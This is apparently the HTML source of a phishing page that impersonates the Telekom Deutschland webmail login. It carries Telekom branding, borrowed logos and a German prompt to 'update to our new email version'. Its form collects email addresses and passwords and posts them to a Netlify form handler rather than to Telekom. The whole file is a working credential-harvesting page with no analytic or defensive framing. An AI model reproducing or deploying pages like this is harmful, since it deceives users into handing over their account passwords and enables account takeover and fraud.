<!DOCTYPE html>
<html>
<head>
<img align="top" alt="© Telekom Deutschland GmbH" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRQfXtQCsdTCmwtnV8bt8pG3a0qx93Sser01XuU-o5pVW3Ymn1u&s"width="280" height="80">
	<meta charset="UTF-8">
	<title>© Telekom Deutschland GmbH</title>
	<link href="style.css" rel="stylesheet">
</head>
<body>
<body style="background-color:white;">
<p>
<p>
<p>
<p>
<div class="login-page">
<div class="form">
<img align="top" alt="© Telekom Deutschland GmbH" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR3y9RBie80wgsc9_ciGZldwDw32rm_VOfvYhHlQYgMKu6aEM-8&s" width="280" height="110">
<form name="contact"  action="/success/" method="POST" data-netlify="true">

		    
						<li>Aktualisieren Sie auf unsere neue E-Mail-Version</li>

  <p>
<fieldset>
<div style="text-align:center;">
<p class="instruction">So können Sie sich anmelden:</p>
        <input type="text" name="username" id="username" title="username" value="" onfocus="this.select()" tabindex="1" placeholder="E-Mail-Adresse:">
        <br>
        <br>
        <input type="password" name="password" id="password" title="password" tabindex="2" placeholder="Passwort:">
        <input type="hidden" name="u" value="email/webmail">
        <input type="hidden" name="c" value="">
        <br>
        <br>
           

    <button type="Login submit-button">JETZT PRÜFEN</button>
  </p>
</form>

		<div class="content_small">
                <div class="content_content">
			        <div class="standard centertext truncate">Noch kein Telekom Login? <a onclick="window.open('https://www.telekom.de/unterwegs/apps-und-dienste/kommunikation/telekom-e-mail','_blank','');window.close();return false;" href="#">Jetzt registrieren</a></div>
                </div>
            </div>
			
	<div class="line_bottom"></div>
	<div class="content_inlay">
		<div class="line"></div>
		<div id="infoTelekomLoginTrigger">
			<div class="xbig centertext">Ein Login für alle Dienste</div>
			<div class="standard centertext">
				<a class="toggle-itl" href="javascript:void(0);">Mehr Infos zum Telekom Login</a>
			</div>		
			<img align="top" alt="© Telekom Deutschland GmbH" src="https://accounts.login.idm.telekom.com/static/factorx/vdplus/images/services.png">